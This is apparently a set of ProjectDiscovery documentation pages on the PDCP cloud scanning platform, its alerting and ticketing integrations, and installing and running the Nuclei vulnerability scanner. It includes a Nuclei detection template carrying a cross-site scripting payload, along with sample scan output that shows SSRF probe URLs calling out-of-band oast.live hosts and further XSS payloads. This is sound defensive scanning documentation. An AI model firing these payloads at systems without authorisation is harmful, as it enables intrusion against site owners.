Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Want to connect your existing Nuclei scan? Check out [our documentation](/cloud/scanning/nuclei-scan) for those steps.
### Automatic Real-Time Vulnerability Scan
PDCP now offers an automatic real-time vulnerability scanning feature:
* **Instant Template Updates**: The system automatically triggers vulnerability scans whenever new Nuclei templates are added to the platform.
* **Immediate Detection**: This ensures immediate detection of the latest vulnerabilities as soon as they are released.
* **Stay Ahead of Threats**: By leveraging this feature, you can stay ahead of potential threats by identifying new vulnerabilities in your assets as soon as detection methods become available.
To enable automatic real-time vulnerability scanning:
1. Navigate to the [Dashboard](https://cloud.projectdiscovery.io) page.
2. Look for the "Automatic Real-Time Scanning" option and enable it.
3. Select your asset groups to configure for Automatic Vulnerability Scan.
### Automatic Discovery with Vulnerability Scan
PDCP now allows you to enable automatic asset discovery before running a vulnerability scan.
* **Automatic Discovery**: You can choose to automatically run asset discovery before scanning.
* **Immediate Scanning**: You can opt to initiate a vulnerability scan immediately after asset discovery completes.
* **Flexible Configuration**: These behaviors are configurable, allowing you to enable or disable automation based on your specific requirements.
To configure discovery and scan automation:
1. Go to the [Scans](https://cloud.projectdiscovery.io/scans) page.
2. Find the "Automatic Discovery" option and adjust it according to your preferences.
3. If you've enabled automatic discovery, asset discovery will be performed before each vulnerability scan.
These new automation features provide greater flexibility and ensure your security posture remains up-to-date with minimal manual intervention.
## Results (Vulnerabilities)
### All Scans
The main **Results** section of Scans displays the summarized results of all the scans in your environment.
Your results can be explored and refined through the categories (Vulnerabilities, Info, Affected Assets) or through filtering (Status, Severity, Host).
### Individual Scans
To view the results of an individual scan, select that scan from the Scans page by clicking on the name. This displays the results of that scan and includes categories (Vulnerabilities, Info, Affected Assets) or filtering (Status, Severity, Host) to explore the details of the individual scan.
Select the **Logs** tab to view scanning logs with information around time, assets, detection template, and match results. The Logs also include error information to assist with any troubleshooting.
### Vulnerabilities
From the results view (all or individual), selecting a vulnerability expands it to show the complete details, including the template(s), assets, and detection information. From the results page you can:
* Export your vulnerabilities (JSON, CSV, PDF)
* Modify the status of the vulnerabilities (false positives/closed)
* Retest individual vulnerabilities
* Review the template used to identify vulnerabilities
Click on the individual vulnerability to review detailed information, including remediation recommendations.
### Configurations
Configurations is where all of our [scanning-based integrations](/cloud/scanning/integrations) are available. The Configurations section includes individual pages for each category outlined below:
* **Alerting** - currently supports integrations with Slack, MS Teams, Email, and Custom Webhooks. These great features can connect the scanning data with your teams through automation.
* **Ticketing** - currently supports integrations for Jira, GitHub, and GitLab. Use these integrations to automatically create tickets in your tracker of choice based on your scan results.
* **Scan** - configure custom HTTP headers, template variables, and a custom Interactsh server for your scans.
* **Template** - review our built-in template configurations or create a new template configuration with template filters to include or exclude based on severity, tags, protocol, and template ID.
# Scan Integrations
A high-level user guide around integrations for scanning including alerts and ticketing
## Summary
ProjectDiscovery Cloud Platform (PDCP) includes integrations for several third-party tools with different user goals in mind.
This includes tools that can keep your team up to date with real time alerts from applications like Slack, Microsoft Teams, and more.
PDCP can also help automate the remediation process with direct integration to ticketing systems like Jira and GitHub.
Visit the [Scans --> Configurations](https://cloud.projectdiscovery.io/scans/configs) section of PDCP to explore and configure your integrations.
Check out our [Scans and Vulnerabilities](/cloud/scanning/createscans) documentation for high-level information on creating a scan and reviewing your vulnerabilities.
## Alerting Integrations
Alerting integrations support notifications as part of scanning and include Slack, Microsoft Teams, Email, and custom Webhooks.
### Slack
PDCP supports scan notifications through Slack. To enable Slack notifications provide a name for your Configuration, a webhook, and an optional username.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated. All Events are selected by default.
* Refer to Slack's [documentation on creating webhooks](https://api.slack.com/messaging/webhooks) for configuration details.
### MS Teams
PDCP supports notifications through Microsoft Teams. To enable notifications, provide a name for your Configuration and a corresponding webhook.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated.
* Refer to [Microsoft’s documentation on creating webhooks](https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook?tabs=newteams%2Cdotnet) for configuration details.
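As with Slack, you can sanity-check a Teams incoming webhook from the terminal before configuring it in PDCP (the URL below is a placeholder for your own webhook):

```bash
# Post a simple test message to the Teams incoming webhook
curl -H 'Content-Type: application/json' \
  -d '{"text": "PDCP alert test"}' \
  https://example.webhook.office.com/webhookb2/your-webhook-path
```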
### Email
PDCP supports notifications via Email. To enable email notifications for completed scans, simply add your recipient email addresses.
### Webhook
PDCP supports notifications via custom Webhook. This functionality supports posting events from any user-defined endpoint based on your environment and system requirements.
To enable webhook notifications for completed scans provide a config name, webhook URL, and the required authentication details.
For example, send a custom webhook to an internal alerting system in this format:
`https://example.com/hook/alert`
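PDCP's event payload is specific to the event type; before wiring up the integration, you may want to confirm your endpoint is reachable and accepts authenticated JSON POSTs. A hypothetical smoke test (the JSON body below is illustrative, not PDCP's actual schema):

```bash
# Verify the endpoint accepts an authenticated JSON POST
curl -X POST https://example.com/hook/alert \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer YOUR_TOKEN' \
  -d '{"event": "scan_finished", "test": true}'
```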
## Ticketing
The integrations under Ticketing support ticketing functionality as part of scanning and include support for Jira, GitHub, GitLab, and Linear.
### Jira
PDCP provides integration support for Jira to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Jira instance URL, the Account ID, the Email, and the associated API token.
Details on creating an API token are available [in the Jira documentation here.](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/)
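One way to confirm the instance URL, email, and API token are valid before saving the configuration is Jira Cloud's `myself` endpoint, which also returns the Account ID the integration asks for (the instance and credentials below are placeholders):

```bash
# Returns your Atlassian account details (including accountId) if the token is valid
curl -u 'you@example.com:YOUR_API_TOKEN' \
  https://your-domain.atlassian.net/rest/api/3/myself
```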
### GitHub
PDCP provides integration support for GitHub to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Organization or username, Project name, Issue Assignee, Token, and Issue Label. The Issue Label determines when a ticket is created. (For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitHub issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Details on setting up access in GitHub [are available here.](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens)
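To verify a personal access token authenticates before using it here, a quick check against the GitHub API can help (the token is a placeholder; for classic tokens, the `X-OAuth-Scopes` response header lists the granted scopes):

```bash
# Confirms the token authenticates; -i prints response headers
curl -i -H 'Authorization: Bearer YOUR_GITHUB_TOKEN' https://api.github.com/user
```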
### GitLab
ProjectDiscovery Cloud Platform provides integration support for GitLab to create new tickets when vulnerabilities are found.
Provide your GitLab username, Project name, Project Access Token, and a GitLab Issue Label. The Issue Label determines when a ticket is created.
(For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitLab issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Refer to GitLab’s documentation for details on [configuring a Project Access token.](https://docs.gitlab.com/ee/user/project/settings/project_access_tokens.html#create-a-project-access-token)
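You can confirm a Project Access Token can see the project before configuring it (the project ID and token below are placeholders):

```bash
# Lists the project's issues if the token is valid and has the api scope
curl -H 'PRIVATE-TOKEN: YOUR_PROJECT_TOKEN' \
  'https://gitlab.com/api/v4/projects/YOUR_PROJECT_ID/issues'
```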
### Linear
ProjectDiscovery Cloud Platform provides integration support for Linear to create new tickets when vulnerabilities are found.
Provide your Linear API Key, Linear Team ID, and Linear Open State ID to set up the integration. Here are the specific steps to access or generate each parameter from your Linear workspace.
* To generate your **Linear API Key**, navigate to Linear > Profile Icon > Preferences > API > Personal API keys > Create new API key. Or, navigate to linear.app/\[workspace name]/settings/api.
* To retrieve your **Linear Team ID**, you can use the following cURL command
```bash
curl -X POST https://api.linear.app/graphql \
-H "Content-Type: application/json" \
-H "Authorization: YOUR_API_KEY" \
-d '{"query":"query { teams { nodes { id name } } }"}'
```
* To retrieve your **Linear Open State ID**, you can use the following cURL command
```bash
curl -X POST https://api.linear.app/graphql \
-H "Content-Type: application/json" \
-H "Authorization: YOUR_API_KEY" \
-d '{"query":"query { workflowStates { nodes { id name } } }"}'
```
Refer to Linear's [documentation](https://developers.linear.app/docs/graphql/working-with-the-graphql-api) for details on their API.
## Scan Configs
Use scan configurations to implement custom HTTP headers, template variables, and a custom Interactsh server for your scans.
## Template Configs
Review our built-in template configurations or create a new template configuration with template filters to include or exclude based on severity, tags, protocol, and template ID.
Learn more about our [Template Editor!](/cloud/editor/overview)
# Connect Your Nuclei Scan to PDCP
Review your Nuclei Scan Results in ProjectDiscovery Cloud Platform
## Overview
In this section we'll walk through the steps you need to run a scan in [Nuclei](/tools/nuclei/overview) and connect your scan to ProjectDiscovery Cloud Platform (PDCP).
## Set up your API Key
To connect your existing Nuclei results to PDCP, you will need to create a free API key.
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
2. Open the settings menu from the top right and select "API Key" to create your API key.
3. Use the `nuclei -auth` command, and enter your API key when prompted.
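For non-interactive use, such as CI pipelines, recent nuclei versions also read the key from the `PDCP_API_KEY` environment variable (treat the exact variable support as version-dependent; the key below is a placeholder):

```bash
# Provide the PDCP API key via the environment instead of the -auth prompt
export PDCP_API_KEY=your-api-key-here
nuclei -target http://honey.scanme.sh -cloud-upload
```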
## Configure Team (Optional)
If you want to upload the scan results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `nuclei -tid XXXXXX -cloud-upload`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
## Run a Scan
To run a scan, from a terminal window with your Nuclei installation, use the `nuclei -target` or `nuclei -u` option to designate a target/host.
**For example, a command might look like:**
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
* This example uses a sample site from ProjectDiscovery ([http://honey.scanme.sh](http://honey.scanme.sh))
* The `-cloud-upload` flag is required to share results with PDCP
* You can run this command against any URL you want (with appropriate permissions)
* To reduce or narrow the scan results you can select a specific template folder for your scan
* For example `nuclei -u http://buffer.com -t dns/ -cloud-upload`
**And the output of your command (scan) would be:**
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
## Viewing Your Scan
After the scan is complete, a URL will be displayed in the command-line output. Visit this URL to check your results in PDCP.
Your scan results will also be available in the Scans tab of PDCP with a generic, system-generated name. You can rename the scan to identify it later.
Once you have run more than one scan, the **Results** tab shows the scan results for all scans in your PDCP environment.
Nuclei scans connected and uploaded to PDCP are scheduled for automatic cleanup after 30 days. This duration is subject to change as we gauge user feedback and requirements.
## Features
### Scans
Scans offer the ability to:
* View a list of all scans in your PDCP environment.
* View details of an individual scan.
* Sort by severity or status, export scan details, change statuses, and search results.
### Templates
Templates include our [Template Editor](/cloud/editor/introduction) to write your own custom templates.
* Experiment with using our [AI Assistance](/cloud/editor/ai) to create custom templates.
* Share your custom templates
Learn more about our [Templates](/templates/introduction).
# PDCP Scanning Overview
Learn more about PDCP scanning features and capabilities
## Key Features
Scans are at the heart of the ProjectDiscovery Cloud Platform (PDCP). Upload Assets to your environment, select the templates you want to use, and configure a scan to check for exploitable vulnerabilities.
Features include:
* Connecting existing Nuclei scans
* Creating new scans
* Viewing active vulnerabilities
* Real-Time vulnerability scan
* Scheduling scans
* Exporting scan details
* Determining active CVEs
* Rescanning
## Getting Started
Before you get started with scanning you will need two things:
* To add your Assets
* To select the templates you want to use
**Assets**
Assets can be added in several ways. Refer to the [Assets documentation](/cloud/assets/overview) for details on adding your Assets through upload, discovery, or cloud integrations.
**Templates**
PDCP includes our large community-curated library of public Nuclei templates. You can use all of those templates, our subset of [recommended templates](/cloud/editor/recommended), a specific selection of templates, or you can create or add your own custom templates.
* Check out the main [Nuclei templates](/templates/introduction) section to learn more about templates or,
* Review the [Templates & Editor](/cloud/editor/overview) section for more information on using templates and the editor within PDCP
## FAQ
### Scanning Basics
**What do I need to do before I can run a scan in PDCP?**
You will need to add assets and identify your templates. From the Scan page, select “Create Scan” to get started.
**What are the differences between running Nuclei versus running a scan on PDCP?**
Scanning with PDCP differs from Nuclei in several ways. The main differences are the use of a different interactsh server along with distributed and faster scanning.
In addition, some scanning capabilities that are part of Nuclei are not included in PDCP (this is mainly due to security concerns).
If you have specific questions about support and future capabilities, feel free to reach out to us.
Capabilities that are offered in Nuclei that are not currently supported in PDCP include:
* file templates
* headless templates
* code templates
* workflows
* templates using a local wordlist
**How do I run a scan/upload existing scan results from Nuclei?**
Scans can be run in Nuclei and connected to PDCP or you can run a scan directly in PDCP from the Scans page.
Scan results from Nuclei can be connected to ProjectDiscovery Cloud Platform.
* Check out the [Connect Nuclei](https://docs.projectdiscovery.io/cloud/free/scan) page for details.
### Vulnerabilities
**My scan results in PDCP are different from my Nuclei results. What happened?**
There are a number of possibilities for this; let’s look at some of the most likely causes.
If you have *more results* in your scan from Nuclei than from PDCP, potential causes include:
* Scanning with templates that are not enabled in PDCP
* Scanning an internal host that is not accessible to PDCP
* A potential PDCP bug
If you have *fewer results* in your scan from Nuclei than from PDCP, potential causes include:
* Your local static IP may have been blocked by the target, while PDCP scans from dynamic IPs
* Nuclei's public interactsh servers may be blocked by WAFs, while PDCP uses a different interactsh server
**What happens if duplicate scan results are uploaded?**
If a user uploads the same scan results - by uploading scan results from Nuclei to update an existing scan using the named scan ID - PDCP discards duplicate data so the original results will remain.
Otherwise any scan information from Nuclei that is uploaded creates a new scan result page in PDCP.
**What are the scan statuses and what do they mean?**
* Stopped - This status indicates that a user has stopped the scan either in PDCP or via the API. Note: Scans in “starting” cannot be stopped.
* Failed - This status indicates that a scan has failed. Click on the icon on the scan list or result page to view error details for the failed scan.
* Starting - Indicates that the scan is initializing.
* Running - Indicates the scan is in progress.
# Adding Parameters
A walkthrough of adding additional parameters to PDCP scan configuration
## Summary
Some Nuclei templates may require additional parameters to run in ProjectDiscovery Cloud Platform (PDCP).
A common example is Nuclei templates that need parameters like username and password to authenticate.
This page provides a common example to show you the steps required to set up scan parameters.
Using the scan configuration you can take advantage of these types of Nuclei templates within PDCP.
## Authentication Example
In this example we’re going to look at a Nuclei template that requires WordPress authentication.
WordPress authentication is required for over 150 different Nuclei templates, and none of these templates can be executed without configuring additional parameters.
For example:
```yaml
id: CVE-2023-1890
info:
name: Tablesome < 1.0.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: Fixed in version 1.0.9.
reference:
- https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
- https://wordpress.org/plugins/tablesome/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1890
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1890
cwe-id: CWE-79
epss-score: 0.00203
epss-percentile: 0.57653
cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: pauple
product: tablesome
framework: wordpress
tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "")'
- 'contains(body_2, "tablesome")'
condition: and
```
In the first request there are two variables that are not defined in the template.
Users are expected to pass the values of these variables `{{username}}` and `{{password}}`.
```
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
```
In Nuclei from the CLI you would simply run the following command:
`nuclei -id CVE-2023-1890 -var username=admin -var password=password123 -target https://example.com`
However, PDCP requires some additional configuration to include these parameters in a scan.
## Variable Configuration in PDCP
To configure these required scan parameters in PDCP you can create a Scan Configuration to pass these variables along in any scans you create.
You can choose to enable this configuration for all scans by default, or apply the configuration manually when you set up a new scan.
Complete these steps to set up username and password parameters for a scan that includes WordPress authentication within the Nuclei templates.
Select Configurations. Next select **Scans** and **New Config**.
* Enter WP Login as the configuration name
* Under Template variables, add a key of `username` with the desired username as its value, and a key of `password` with the corresponding password as its value
* Update Enable for all scans based on your preferences. *Keeping it selected (default) will pass the new variables to any templates that have these variables defined.*
Select **Create** to create the new scan configuration.
## What's Next?
Now that you have created a new scan configuration, if it is set to *“Enable for all scans”* it will automatically appear as a configuration for any new scans you create.
* If this is not enabled, you will be able to choose the configuration for any scan you create.
Create a new scan and select any WordPress templates you want to include. You can also create a custom template profile to define a specific group of WP templates.
# Explore Use Cases
Walk through some key workflows available in ProjectDiscovery Cloud Platform
Check out some ways to get started securing your attack surface with ProjectDiscovery Cloud Platform (PDCP).
What part of your tech stack is exposed on the internet? Add assets to build your scanning inventory.
Establish a schedule for continuous scanning to look for exploitable vulnerabilities across your attack surface.
Use your internal reports to build custom automation and scan for exploitable vulnerabilities.
Continuously retest vulnerabilities and detect similar issues across your infrastructure.
A popular attack appears on the news. Quickly scan your assets to see if you're impacted.
Keep your team in the loop on exploitable vulnerabilities with a Slack alert.
Empower your team with actionable follow up for exploitable vulnerabilities by creating Jira tickets.
# Try ProjectDiscovery
Learn about the ProjectDiscovery Cloud Platform
## What is ProjectDiscovery Cloud Platform?
[ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/) (PDCP) is a cloud-hosted security platform designed to provide continuous visibility across your external attack surface by detecting exploitable vulnerabilities and misconfigurations.
It is built to solve a variety of use cases, and scale to support the key workflows application security teams need to secure their infrastructure.
* Visit the full [PDCP Docs](/cloud/introduction)
* Review [our FAQ](/cloud/general-faq)
* Explore some common [use cases](/cloud/usecases)
## What are some key features?
PDCP offers a range of capabilities including cloud-hosting, asset discovery and management, remediation and regression testing workflows, reporting, collaboration, integrations and more.
* Check out more info [on our features](/cloud/features)
## How do I get started?
To get started visit [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/) and sign up.
# How to Use ProjectDiscovery Documentation
A quick start guide to docs and resources.
Welcome to ProjectDiscovery's documentation hub, a primary resource for everything related to ProjectDiscovery. We offer information about all of our solutions to support potential customers, new users, and our existing community.
Our goal is to offer a well-organized, comprehensive knowledge base for new users, existing customers, and the broader community. We’re continually improving to make it easier for everyone to explore and benefit from our tools, helping democratize security for all.
### Quick Navigation
* Use **search** to locate a specific term or topic. For more specific results, use a phrase or question for a detailed AI-powered response.
* Navigate through sections with the **tabs** at the top (Tools, Templates, Cloud Platform, etc.)
* Check out the **[Help](/help)** tab for support and info on joining our community.
## What's Inside
Let’s explore the main sections of the documentation site:
* [**Tools**](/tools): Explore our suite of open-source tools. Whether you're a seasoned pro or just getting started, this section breaks down each tool's purpose, features, and how-tos.
* [**Nuclei Templates**](/templates): Learn how to use and customize Nuclei templates. These templates are key to precise vulnerability detection in both Nuclei and PDCP.
* [**Cloud Platform**](/cloud): **ProjectDiscovery Cloud Platform (PDCP)** is a scalable, cloud-hosted security solution. Check out the features, benefits, and step-by-step instructions to maximize its potential.
* [**API**](/api-reference): **Integrate**, **Automate**, or **Expand**, our cloud's API documentation has you covered. Dive into detailed endpoints, request-response patterns, and best practices to seamlessly weave ProjectDiscovery into your workflow.
* [**Help**](/help): Questions? In need of some guidance to create a specific workflow or resolve a particular issue? Check out help to review our support resources.
Didn't find what you were looking for? Visit [GitHub](https://github.com/projectdiscovery) for additional tools and content.
## Feedback or Questions
We aim to make this documentation as useful as possible. Did you find what you needed? Use the *"Was this helpful?"* 👍 or 👎 at the bottom of any page to provide feedback.
Have suggestions for improvement or a correction? Submit a PR through **Suggested Edits**.
If you have more questions, reach out to [support@projectdiscovery.io](mailto:support@projectdiscovery.io)
## Join the Community
If you want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
Welcome to the ProjectDiscovery Discord Server!
Get support, share stories, and engage with the community.
# Nuclei Setup Example
Learn how to install Nuclei and start scanning for vulnerabilities.
## Installations
### Install Go
ProjectDiscovery runs on any OS that supports Go.
This example uses Linux, but [this blog post](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) provides instructions for other OSs. You can also refer to [Go's installation guide](https://go.dev/doc/install).
Download and install [the latest version of Go](https://go.dev/doc/install).
Run `go version` to confirm installation (*v1.21 at the time of writing*).
### Update your `$PATH`
The `$PATH` variable defines directories with executable programs. You need to add the `go/bin` directory (where ProjectDiscovery binaries reside) to `$PATH` manually.
This folder is not automatically added to your `$PATH`. Refer to the steps below to update it manually.
Run `go env | grep GOPATH` and copy the output path. Append `/bin` to it if needed.
Edit your shell config (e.g., `nano ~/.zshrc` for zsh or `nano ~/.bashrc` for bash). Add `export PATH="$PATH:/your/go/path/bin"` at the end.
Run `source ~/.zshrc` or `source ~/.bashrc`, or restart your terminal.
Run `echo $PATH` to confirm the Go binary directory is included.
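Put together, the steps above look roughly like this for a bash setup (this sketch assumes the default `$HOME/go` GOPATH; adjust the path and shell config file to match your system):

```bash
# Find the Go workspace path, then append its bin directory to PATH
go env GOPATH                                        # e.g. /home/user/go
echo 'export PATH="$PATH:$HOME/go/bin"' >> ~/.bashrc # persist for new shells
source ~/.bashrc                                     # apply to the current shell
echo "$PATH" | tr ':' '\n' | grep go                 # confirm go/bin is present
```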
### Install Nuclei
A quick overview of Nuclei and its templates before installation.
**What is Nuclei?**
> Nuclei is a community-powered vulnerability scanner that uses templates to identify vulnerabilities in your assets.
> As an open-source tool, it has the benefit of a huge community of users and contributors who have helped to create a vast library of templates.
Templates are YAML files used to define what is scanned by Nuclei. The template library includes many options and customizations, and supports any templates you create to meet your requirements.
Run `go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` in your terminal.
Run `nuclei -h` to see available options and flags.
### Sample Nuclei Output
```console
user@Sample ~ % nuclei -h
Nuclei is a fast, template based vulnerability scanner focused
on configurability, extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with DNS record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-tu, -template-url string[] list of template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wu, -workflow-url string[] list of workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
```
## Run a Scan
Let's run a scan against a test host to showcase Nuclei’s behavior.
> We'll be using the test URL (`http://honey.scanme.sh/`) to demonstrate the expected scan behavior and walk you through some results.
### Scan your host
Run `nuclei -u http://honey.scanme.sh/` to scan the target host with all available templates.
*The -u option specifies the target you want to scan with all available templates.*
### View results
Here's an example (edited for easier readability):
```console
user@Test-MBP ~ % nuclei -u http://scanme.sh
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.4
projectdiscovery.io
[WRN] Found 2298 templates with syntax error (use -validate flag for further examination)
[WRN] Found 16 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 4982
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1230 (Reduced 1179 Requests)
[INF] Using Interactsh Server: oast.fun
[ssl-issuer] [ssl] [info] scanme.sh:443 [pd]
[self-signed-ssl] [ssl] [low] scanme.sh:443
[mismatched-ssl-certificate] [ssl] [low] scanme.sh:443 [CN: scanme]
[http-missing-security-headers:strict-transport-security] [http] [info] http://scanme.sh
[http-missing-security-headers:permissions-policy] [http] [info] http://scanme.sh
----
[weak-cipher-suites:tls-1.1] [ssl] [low] scanme.sh:443 [[tls11 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA]]
[nameserver-fingerprint] [dns] [info] scanme.sh [ns69.domaincontrol.com.,ns70.domaincontrol.com.]
```
### Understanding your results
If you examine the following line of output
`[mismatched-ssl-certificate] [ssl] [low] scanme.sh:443 [CN: scanme]`
The fields are as follows:
* `[mismatched-ssl-certificate]` is the template-id for the finding
* `[ssl]` is the protocol associated with the finding
* `[low]` is the severity associated with the finding
* `scanme.sh:443` is the output (in this case the host that the finding applies to)
* `[CN: scanme]` - This output also includes an [extracted value](https://docs.projectdiscovery.io/templates/reference/extractors), which is not typically in all templates but does show an example of some of the other types of output you might see.
So, each line of output follows this structure:
`[template-id]` `[protocol]` `[severity]` `output (impacted host, etc)`
**Other examples:**
```
[wp-ambience-xss] [http] [medium] http://honey.scanme.sh/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
```
```
[tikiwiki-reflected-xss] [http] [high] http://honey.scanme.sh/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
```
Take a look at the ["Next Steps"](/getstarted-nextsteps) section for suggestions on what to explore next.
# Next Steps in Nuclei
You've completed the Getting Started guide. Here's what you can explore next.
## Learn More About Nuclei
Now that you understand the basics we have a ton of resources available to help you learn more about Nuclei capabilities.
* Discover [where Nuclei can benefit you or your organization](https://docs.projectdiscovery.io/tools/nuclei/overview#where-to-use-nuclei).
* Learn more about [running Nuclei](https://docs.projectdiscovery.io/tools/nuclei/running) and explore the [public template library](https://docs.projectdiscovery.io/tools/nuclei/running#public-templates).
* Find guidance on choosing [an effective scan strategy](https://docs.projectdiscovery.io/tools/nuclei/running#which-scan-strategy-to-use).
## Explore Our Open-source Tools
> Explore more tools we offer and see how they fit into the categories of **Discover, Enrich, Detect** to optimize your security assessments. Check them out [here](https://docs.projectdiscovery.io/tools/index).
## Summary Video
Watch this 30-minute video for an overview of all ProjectDiscovery tools.
# Get Started with ProjectDiscovery
## Overview
